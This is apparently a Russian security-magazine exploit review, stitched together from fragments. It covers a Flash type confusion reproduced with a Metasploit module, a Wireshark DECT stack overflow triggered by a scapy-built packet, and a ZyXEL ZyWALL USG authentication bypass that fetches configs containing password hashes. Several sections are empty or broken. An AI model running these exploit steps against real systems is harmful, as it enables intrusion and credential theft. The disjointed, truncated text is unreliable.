Ρ€Π΅Π°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Π° SMB Π² Π½Π΅Π°ΠΊΡ‚ΡƒΠ°Π»ΡŒΠ½ΠΎΠΉ вСрсии Microsoft.

ΠšΡ€ΠΎΠΌΠ΅ этого, EternalBlue Ρ‚Π°ΠΊΠΆΠ΅ Π±Ρ‹Π» инструмСнтом Π²ΠΎ врСмя извСстной Π°Ρ‚Π°ΠΊΠΈ Diskcoder.C (Petya, NotPetya ΠΈ ExPetya).

Π£Π·Π½Π°Ρ‚ΡŒ большС

Особой ΠΏΠΎΠΏΡƒΠ»ΡΡ€Π½ΠΎΡΡ‚ΡŒΡŽ срСди кибСрпрСступников ΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ Β«0-Π΄Π½Π΅Π²Π½Ρ‹Π΅Β» уязвимости. ΠŸΡ€ΠΈΠΌΠ΅Ρ€ΠΎΠΌ ΠΈΡ… примСнСния являСтся послСдняя кампания Π³Ρ€ΡƒΠΏΠΏΡ‹ кибСрпрСступников Buhtrap, которая Π½Π°Ρ‡Π°Π»Π° ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ эксплойт с Ρ†Π΅Π»ΡŒΡŽ получСния доступа для запуска своих врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ ΠΈ осущСствлСния шпионской Π΄Π΅ΡΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΠΈ Π² Восточной Π•Π²Ρ€ΠΎΠΏΠ΅ ΠΈ Π¦Π΅Π½Ρ‚Ρ€Π°Π»ΡŒΠ½ΠΎΠΉ Азии.

ВрСдоносныС ΠΊΠΎΠΌΠΏΠΎΠ½Π΅Π½Ρ‚Ρ‹ Π΄ΠΎΡΡ‚Π°Π²Π»ΡΡŽΡ‚ΡΡ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΎΠ², ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΠΎΠ±ΡƒΠΆΠ΄Π°ΡŽΡ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΡŒ ΠΈΡ…. Анализ Ρ‚Π°ΠΊΠΈΡ… Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΎΠ²-ΠΏΡ€ΠΈΠΌΠ°Π½ΠΎΠΊ Π΄Π°Π΅Ρ‚ подсказки ΠΎ Ρ‚ΠΎΠΌ, Π½Π° ΠΊΠΎΠ³ΠΎ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ Π½Π°Ρ†Π΅Π»Π΅Π½Π° Π°Ρ‚Π°ΠΊΠ°. Когда Π°Ρ‚Π°ΠΊΠΈ Π½Π°ΠΏΡ€Π°Π²Π»Π΅Π½Ρ‹ Π½Π° коммСрчСскиС ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ, Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚Ρ‹-ΠΏΡ€ΠΈΠΌΠ°Π½ΠΊΠΈ, ΠΊΠ°ΠΊ ΠΏΡ€Π°Π²ΠΈΠ»ΠΎ, замаскированныС ΠΏΠΎΠ΄ ΠΊΠΎΠ½Ρ‚Ρ€Π°ΠΊΡ‚Ρ‹ ΠΈΠ»ΠΈ счСта-Ρ„Π°ΠΊΡ‚ΡƒΡ€Ρ‹.

ΠšΡ€ΠΎΠΌΠ΅ этого, эксплойт использовался Π² Π°Ρ‚Π°ΠΊΠ°Ρ… Π³Ρ€ΡƒΠΏΠΏΡ‹ кибСрпрСступников PowerPool. ВрСдоносный ΠΊΠΎΠ΄ Π±Ρ‹Π» Π½Π°Ρ†Π΅Π»Π΅Π½ Π½Π° ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Windows, Π° ΠΈΠΌΠ΅Π½Π½ΠΎ ALPC Local Privilege Escalation.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

ΠžΠ±Π·ΠΎΡ€ эксплойтов

Π‘ΠΎΠ΄Π΅Ρ€ΠΆΠ°Π½ΠΈΠ΅ ΡΡ‚Π°Ρ‚ΡŒΠΈ

Π”Π°Π»ΡŒΠ½Π΅ΠΉΡˆΠΈΠΉ Π°Π½Π°Π»ΠΈΠ· уязвимости, Π²Ρ‹Π·Π²Π°Π½Π½ΠΎΠΉ Π²Ρ‹ΡˆΠ΅ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅Π½Π½Ρ‹ΠΌ ΠΊΠΎΠ΄ΠΎΠΌ, ΠΏΠΎΠΊΠ°Π·Ρ‹Π²Π°Π΅Ρ‚, Ρ‡Ρ‚ΠΎ ΠΌΡ‹ ΠΈΠΌΠ΅Π΅ΠΌ ΠΎΡ‡Π΅Ρ€Π΅Π΄Π½ΡƒΡŽ Π½Π΅Ρ€Π°Π·Π±Π΅Ρ€ΠΈΡ…Ρƒ с Ρ‚ΠΈΠΏΠΎΠΌ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Π°, ΠΏΡ€ΠΎΠΈΠ·ΠΎΡˆΠ΅Π΄ΡˆΡƒΡŽ Π² SharedObject.prototype.getSize(), ΠΊΠΎΠ³Π΄Π° класс Date Ρ€Π°ΡΡˆΠΈΡ€ΡΠ΅Ρ‚ΡΡ Π΄ΠΎΠ±Π°Π²Π»Π΅Π½ΠΈΠ΅ΠΌ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΎΠΉ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ, ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½Π½ΠΎΠΉ Ρ‡Π΅Ρ€Π΅Π· SharedObject.prototype.getSize. ΠžΠ±ΡŠΠ΅ΠΊΡ‚ Date инициализируСтся Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ΠΌ 1.41466385537348e-315, ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ΅ ΠΏΡ€ΠΈ сохранСнии Π² памяти прСобразуСтся Π² 0x11111110, Π° ΠΎΠ½, Π² свою ΠΎΡ‡Π΅Ρ€Π΅Π΄ΡŒ, ΠΏΠΎΠ΄Ρ…ΠΎΠ΄ΠΈΡ‚ для Ρ€Π΅Π°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ Ρ‚Π΅Ρ…Π½ΠΈΠΊΠΈ heap spraying. Когда вызываСтся ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠ°Ρ функция Date.c_fun(), ΡƒΠΏΡ€Π°Π²Π»Π΅Π½ΠΈΠ΅ пСрСдаСтся Π² SharedObject.prototype.getSize(), Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ происходит нСкоррСктная интСрпрСтация ΠΏΠ΅Ρ€Π΅Π΄Π°Π²Π°Π΅ΠΌΠΎΠ³ΠΎ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Π° Date ΠΊΠ°ΠΊ ΠΈΠΌΠ΅ΡŽΡ‰Π΅Π³ΠΎ Ρ‚ΠΈΠΏ SharedObject, Π² Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ Ρ‡Π΅Π³ΠΎ ΡΠΎΠ²Π΅Ρ€ΡˆΠ°Π΅Ρ‚ΡΡ ΠΏΠΎΠΏΡ‹Ρ‚ΠΊΠ° ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ Π±Ρ‹Π» ΠΈΠ½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Π½ ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ Date (0x11111110), ΠΊΠ°ΠΊ ΡƒΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒ Π½Π° Ρ‚Π°Π±Π»ΠΈΡ†Ρƒ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Ρ… Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΉ. Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ ΠΈΠ· metasploit, запустим Π½Π° ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Π½ΠΎΠΉ уязвимости машинС ΠΊΠ°Π»ΡŒΠΊΡƒΠ»ΡΡ‚ΠΎΡ€:

msf > use exploit/windows/browser/adobe_flashplayer_flash10o
msf exploit(…) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(…) > set CMD calc.exe
CMD => calc.exe
msf exploit(…) > exploit
[] Exploit running as background job.msf exploit(adobe_fl ashplayer_flash10o) >
[
] Using URL: http://0.0.0.0:8080/Jk32OyCPJ0NUR6B
[] Local IP: http://192.168.2.20:8080/Jk32OyCPJ0NUR6B
[
] Server started.

Π‘Π΅Ρ€Π²Π΅Ρ€ Π·Π°ΠΏΡƒΡ‰Π΅Π½. Π’Π΅ΠΏΠ΅Ρ€ΡŒ ΠΎΡ‚ нас трСбуСтся Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΠΏΡ€ΠΎΠΉΡ‚ΠΈ ΠΏΠΎ прСдоставлСнной ссылкС (http://192.168.2.20:8080/Jk32OyCPJ0NUR6B) ΠΈ ΠΌΡ‹ смоТСм смирСнно, Π·Π°Ρ‚Π°ΠΈΠ² Π΄Ρ‹Ρ…Π°Π½ΠΈΠ΅ Π½Π°Π±Π»ΡŽΠ΄Π°Ρ‚ΡŒ Π·Π° Ρ‚Π΅ΠΌ, ΠΊΠ°ΠΊ Internet Explorer прСвращаСтся Π² ΠΊΠ°Π»ΡŒΠΊΡƒΠ»ΡΡ‚ΠΎΡ€.

Targets

IE 6/7 Π½Π° Windows XP SP3 ΠΈ Windows Vista.

Solution

ΠžΠ±Π½ΠΎΠ²ΠΈΡ‚ΡŒ Adobe Flash Player.

pkt_bfield прСдставляСт собой структуру Ρ‚ΠΈΠΏΠ° dect_bfield, описаниС ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ ΠΏΡ€ΠΈΠ²Π΅Π΄Π΅ΠΌ Π½ΠΈΠΆΠ΅:

struct dect_bfi eld
<
guint8 Data[128];
guint8 Length;
>;

Как Π²ΠΈΠ΄Π½ΠΎ, происходит ΠΊΠΎΠΏΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ Π΄Π°Π½Π½Ρ‹Ρ… ΠΏΠ°ΠΊΠ΅Ρ‚Π° Π² 128-Π±Π°ΠΉΡ‚Π½Ρ‹ΠΉ Π±ΡƒΡ„Π΅Ρ€ Data, Ρ€Π°ΡΠΏΠΎΠ»Π°Π³Π°ΡŽΡ‰ΠΈΠΉΡΡ Π½Π° стСкС. Для Ρ‚ΠΎΠ³ΠΎ Ρ‡Ρ‚ΠΎΠ±Ρ‹ Π»ΠΈΡ†Π΅Π·Ρ€Π΅Ρ‚ΡŒ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π²ΠΎΠΎΡ‡ΠΈΡŽ, Π½Π°ΠΌ Π½Π°Π΄ΠΎ Π±ΡƒΠ΄Π΅Ρ‚ ΡΡ„ΠΎΡ€ΠΌΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ pcap-Ρ„Π°ΠΉΠ» ΠΈ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΈΡ‚ΡŒ Π΅Π³ΠΎ Π½Π° Π½ΡƒΠΆΠ½Ρ‹ΠΉ интСрфСйс. НапримСр, этого ΠΌΠΎΠΆΠ½ΠΎ Π΄ΠΎΠ±ΠΈΡ‚ΡŒΡΡ, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ΠΏΡ€Π΅ΠΊΡ€Π°ΡΠ½ΡƒΡŽ Π²Π΅Ρ‰ΡŒ ΠΏΠΎΠ΄ Π½Π°Π·Π²Π°Π½ΠΈΠ΅ΠΌ scapy:

#!/usr/bin/env python
import sys
from scapy import * wrpcap(«test.pcap»,Ether(type=0x2323)/(«A»*1000))

ЗапускаСм wireshark, заставляСм Π΅Π³ΠΎ ΡΠ»ΡƒΡˆΠ°Ρ‚ΡŒ Π½ΡƒΠΆΠ½Ρ‹ΠΉ Π½Π°ΠΌ интСрфСйс ΠΈ шлСм Π΅ΠΌΡƒ ΠΏΡ€ΠΈΠ²Π΅Ρ‚ Π² Π²ΠΈΠ΄Π΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‡Ρ‚ΠΎ сформированного ΠΏΠ°ΠΊΠ΅Ρ‚Π°:

Π ΠΎΠ²Π½ΠΎ ΠΎΠ΄ΠΈΠ½ ΠΏΠ°ΠΊΠ΅Ρ‚ β€” ΠΈ wireshark с Π³Ρ€ΠΎΡ…ΠΎΡ‚ΠΎΠΌ ΠΏΠ°Π΄Π°Π΅Ρ‚ Π½ΠΈΡ†. Ну Π° Ρ‚Π΅ΠΏΠ΅Ρ€ΡŒ, Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡΡ Π±Π»Π°Π³Π°ΠΌΠΈ Ρ†ΠΈΠ²ΠΈΠ»ΠΈΠ·Π°Ρ†ΠΈΠΈ Π² Π²ΠΈΠ΄Π΅ модуля для metasploit ΠΈ сформируСм эксплоит с классичСской, ΠΏΠΎΠ»Π΅Π·Π½ΠΎΠΉ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΎΠΉ Π² Π²ΠΈΠ΄Π΅ запуска ΠΊΠ°Π»ΡŒΠΊΡƒΠ»ΡΡ‚ΠΎΡ€Π°:

ЗапускаСм wireshark, ставим ΠΏΡ€ΠΎΡΠ»ΡƒΡˆΠΊΡƒ интСрфСйса. ΠžΡ‚ΠΏΡ€Π°Π²Π»ΡΠ΅ΠΌ врСдоносный ΠΏΠ°ΠΊΠ΅Ρ‚:

Targets

Solution

ΠœΠ½ΠΎΠΆΠ΅ΡΡ‚Π²Π΅Π½Π½Ρ‹Π΅ уязвимости Π² Zyxel Zywall USG

CVSSV2

Brief

БСрия ΠΆΠ΅Π»Π΅Π·ΠΎΠΊ ZyWALL USG β€” Π½ΠΎΠ²ΠΎΠ΅ комплСксноС Ρ€Π΅ΡˆΠ΅Π½ΠΈΠ΅ ΠΎΡ‚ ZyXEL для обСспСчСния ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ бСзопасности ΠΈ управлСния Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠΎΠΌ, Π²ΠΊΠ»ΡŽΡ‡Π°Ρ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΡƒΡŽ Π½Π°ΡΡ‚Ρ€Π°ΠΈΠ²Π°Π΅ΠΌΡƒΡŽ Π·Π°Ρ‰ΠΈΡ‚Ρƒ ΠΎΡ‚ спама, ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒ полосы пропускания для Ρ€Π°Π·Π½ΠΎΠΎΠ±Ρ€Π°Π·Π½Ρ‹Ρ… ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ΠΎΠ² cΠ΅Ρ‚ΠΈ, ΠΏΡ€Π΅Π΄ΠΎΡ‚Π²Ρ€Π°Ρ‰Π΅Π½ΠΈΠ΅ Π²Ρ‚ΠΎΡ€ΠΆΠ΅Π½ΠΈΠΉ ΠΈ Π±Π΅Π·ΠΎΠΏΠ°ΡΠ½ΠΎΡΡ‚ΡŒ ΡƒΠ΄Π°Π»Π΅Π½Π½Ρ‹Ρ… ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠΉ ΠΏΡ€ΠΈ ΠΏΠΎΠΌΠΎΡ‰ΠΈ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Ρ… частных сСтСй. Π’ Π½Π°Ρ‡Π°Π»Π΅ мая нСмСцкая Π³Ρ€ΡƒΠΏΠΏΠ° RedTeam Pentesting ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π»Π° ΠΎΡ‚Ρ‡Π΅Ρ‚ ΠΎ Π΄Π²ΡƒΡ… уязвимостях Π² этих устройствах, Π½Π°ΠΉΠ΄Π΅Π½Π½Ρ‹Ρ… ΠΈΠΌΠΈ Π² Ρ…ΠΎΠ΄Π΅ ΠΎΠ΄Π½ΠΎΠ³ΠΎ ΠΈΠ· пСнтСстов: ΠΎΠ±Ρ…ΠΎΠ΄ Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ ΠΈ ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ. Π’ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ эксплуатации ΠΏΠ΅Ρ€Π²ΠΎΠΉ уязвимости Π½Π΅Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ ΠΌΠΎΠ³ΡƒΡ‚ ΡΠΊΠ°Ρ‡ΠΈΠ²Π°Ρ‚ΡŒ ΠΈ Π·Π°Π³Ρ€ΡƒΠΆΠ°Ρ‚ΡŒ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΎΠ½Π½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹ Π² устройства, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΈΠΌΠ΅Π½ΡΡŽΡ‚ΡΡ автоматичСски. Π’ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ использования Π²Ρ‚ΠΎΡ€ΠΎΠ³ΠΎ Π±Π°Π³Π° ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ с ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½Π½Ρ‹ΠΌΠΈ ΠΏΡ€Π°Π²Π°ΠΌΠΈ ΠΌΠΎΠΆΠ΅Ρ‚ ΡΡ‚Π°Ρ‚ΡŒ Π°Π΄ΠΌΠΈΠ½ΠΎΠΌ ΠΈ ΠΌΠ΅Π½ΡΡ‚ΡŒ Ρ‡Π΅Ρ€Π΅Π· Π²Π΅Π±-интСрфСйс Π»ΡŽΠ±Ρ‹Π΅ настройки.

Exploit

ОбновлСния ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΎΠΊ для устройств ZyXEL ZyWALL USG ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²Π»ΡΡŽΡ‚ собой ΠΎΠ±Ρ‹Ρ‡Π½Ρ‹ΠΉ zip-Π°Ρ€Ρ…ΠΈΠ², Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΌ Ρ‚Π°ΠΊΠΆΠ΅ находятся Π΅Ρ‰Π΅ Π΄Π²Π° Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… zip-Π°Ρ€Ρ…ΠΈΠ²Π° с основной ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΎΠΉ. НапримСр, Π°Ρ€Ρ…ΠΈΠ² с ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΎΠΉ 2.21(BQD.2) для ZyWALL USG 20 (Β«ZyWALL USG 20_2.21(BDQ.2)C0.zipΒ») содСрТит ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ Ρ„Π°ΠΉΠ»Ρ‹:

Π€Π°ΠΉΠ»Ρ‹ 221BDQ2C0.bin ΠΈ 221BDQ2C0.db, нСсмотря Π½Π° ΡƒΠΊΠ°Π·Π°Π½Π½ΠΎΠ΅ Ρ€Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΠ΅, ΡΠ²Π»ΡΡŽΡ‚ΡΡ Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΌΠΈ zip-Π°Ρ€Ρ…ΠΈΠ²Π°ΠΌΠΈ (кстати, Π² Π°Π½Π°Π»ΠΈΠ·Π΅ Ρ‚ΠΈΠΏΠ° Ρ„Π°ΠΉΠ»Π° всСм линуксоидам ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΠΎΠΌΠΎΡ‡ΡŒ стандартная ΡƒΡ‚ΠΈΠ»ΠΈΡ‚Π° /usr/bin/file). МоТно ΠΏΡ€ΠΎΡΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ список Ρ„Π°ΠΉΠ»ΠΎΠ² Π² этих Π°Ρ€Ρ…ΠΈΠ²Π°Ρ…:

Π‘Ρ‹Π»ΠΎ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΎ, Ρ‡Ρ‚ΠΎ Ρ€Π°Π·ΠΌΠ΅Ρ€ Ρ„Π°ΠΉΠ»Π° 221BDQ2C0.conf ΠΈΠ· Π³Π»Π°Π²Π½ΠΎΠ³ΠΎ Π°Ρ€Ρ…ΠΈΠ²Π° Π² точности совпадаСт с Ρ€Π°Π·ΠΌΠ΅Ρ€ΠΎΠΌ Ρ„Π°ΠΉΠ»Π° system-default.conf ΠΈΠ· Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… Π°Ρ€Ρ…ΠΈΠ²ΠΎΠ². Π’Π°ΠΊΠΎΠΉ Ρ„Π°ΠΊΡ‚ Π½Π΅ ΠΌΠΎΠΆΠ΅Ρ‚ Π½Π΅ Π½Π°ΠΌΠ΅ΠΊΠ°Ρ‚ΡŒ Π½Π° ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎΠ΅ ΠΏΡ€ΠΈΠΌΠ΅Π½Π΅Π½ΠΈΠ΅ извСстной ΠΈΠ· области ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ°Π½Π°Π»ΠΈΠ·Π° Π°Ρ‚Π°ΠΊΠΈ с извСстным ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΌ тСкстом, Ρ‡Ρ‚ΠΎ ΠΈ Π±Ρ‹Π»ΠΎ ΠΏΡ€ΠΎΠ΄Π΅Π»Π°Π½ΠΎ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΡ… ΡƒΡ‚ΠΈΠ»ΠΈΡ‚:

ПослС этого Ρ„Π°ΠΉΠ» с исходной Ρ„Π°ΠΉΠ»ΠΎΠ²ΠΎΠΉ систСмой устройства compress.img раскрываСтся с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ unsquashfs. Устройства ZyWALL USG ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‚ΡΡ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Π²Π΅Π±-интСрфСйса Π½Π° сСрвСрС Apache. Π§Ρ‚ΠΎΠ±Ρ‹ Π²ΠΎΠΉΡ‚ΠΈ Ρ‚ΡƒΠ΄Π°, Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ ΠΏΡ€ΠΎΠΉΡ‚ΠΈ Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΡŽ. ΠœΠΎΠ΄ΡƒΠ»ΡŒ Β«mod_auth_zyxel.soΒ» Ρ€Π΅Π°Π»ΠΈΠ·ΡƒΠ΅Ρ‚ этот Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π» ΠΈ настраиваСтся Π² Ρ„Π°ΠΉΠ»Π΅ /etc/service_conf/httpd.conf, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΌΠΎΠΆΠ½ΠΎ ΠΈΠ·Π²Π»Π΅Ρ‡ΡŒ ΠΈΠ· compress.img. Π’ этом ΠΊΠΎΠ½Ρ„ΠΈΠ³Π΅ Π΅ΡΡ‚ΡŒ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΈΠ²Π° Β«AuthZyxelSkipPatternΒ», которая отмСняСт Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΡŽ для Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… Ρ‚ΠΎΡ‡Π΅ΠΊ:

AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /language

Админский интСрфСйс состоит ΠΈΠ· Π½Π΅ΡΠΊΠΎΠ»ΡŒΠΊΠΈΡ… CGI-скриптов. НапримСр, прослСдуя ΠΏΠΎ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅ΠΉ ссылкС послС Π»ΠΎΠ³ΠΈΠ½Π° ΠΏΠΎΠ΄ Π°Π΄ΠΌΠΈΠ½ΠΎΠΌ, ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΎΠ½Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ»:

Π‘Π΅Ρ€Π²Π΅Ρ€ Apache Π² стандартной ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ позволяСт Π΄ΠΎΠ±Π°Π²Π»ΡΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹Π΅ ΠΏΡƒΡ‚ΠΈ ΠΊ CGI-скриптам. Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ, Π΄ΠΎΠ±Π°Π²ΠΈΠ² строку Β«/images/Β» Π² Π²Ρ‹ΡˆΠ΅ΡΡ‚ΠΎΡΡ‰ΡƒΡŽ ссылку, скрипт Β«export-cgiΒ» всС Ρ€Π°Π²Π½ΠΎ ΠΎΡ‚Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ ΠΈ выдаст ΠΊΠΎΠ½Ρ„ΠΈΠ³:

А Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ строка Β«/images/Β» присутствуСт Π² Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΈΠ²Π΅ AuthZyxelSkipPattern, Ρ‚ΠΎ эту ссылку ΠΌΠΎΠΆΠ½ΠΎ ΠΎΡ‚ΠΊΡ€Ρ‹Π²Π°Ρ‚ΡŒ Π΄Π°ΠΆΠ΅ Π½Π΅ залогинившись Π² админской ΠΏΠ°Π½Π΅Π»ΠΈ. ΠŸΠΎΠ»ΡƒΡ‡Π΅Π½Π½Ρ‹ΠΉ ΠΊΠΎΠ½Ρ„ΠΈΠ³ содСрТит Ρ‡ΡƒΠ²ΡΡ‚Π²ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅, Ρ‚Π°ΠΊΠΈΠ΅ ΠΊΠ°ΠΊ Ρ…Π΅ΡˆΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ ΠΈ ΠΏΡ€Π°Π²ΠΈΠ»Π° Ρ„Π°ΠΉΡ€Π²ΠΎΠ»Π°.

ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, Π² административном интСрфСйсС Π΅ΡΡ‚ΡŒ скрипт ΠΏΠΎΠ΄ Π½Π°Π·Π²Π°Π½ΠΈΠ΅ΠΌ Β«file_upload-cgiΒ», ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ, ΠΊΠ°ΠΊ Π»Π΅Π³ΠΊΠΎ Π΄ΠΎΠ³Π°Π΄Π°Ρ‚ΡŒΡΡ, позволяСт Π·Π°Π³Ρ€ΡƒΠΆΠ°Ρ‚ΡŒ Ρ„Π°ΠΉΠ»Ρ‹. ΠŸΡ€ΠΈΠΌΠ΅Π½ΡΡ Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½Ρ‹ΠΉ Ρ„ΠΈΠ½Ρ‚ со строкой Β«/ images/Β», ΠΌΠΎΠΆΠ½ΠΎ Π·Π°Π³Ρ€ΡƒΠΆΠ°Ρ‚ΡŒ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΠΈ Π±Π΅Π· всякой Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ. К 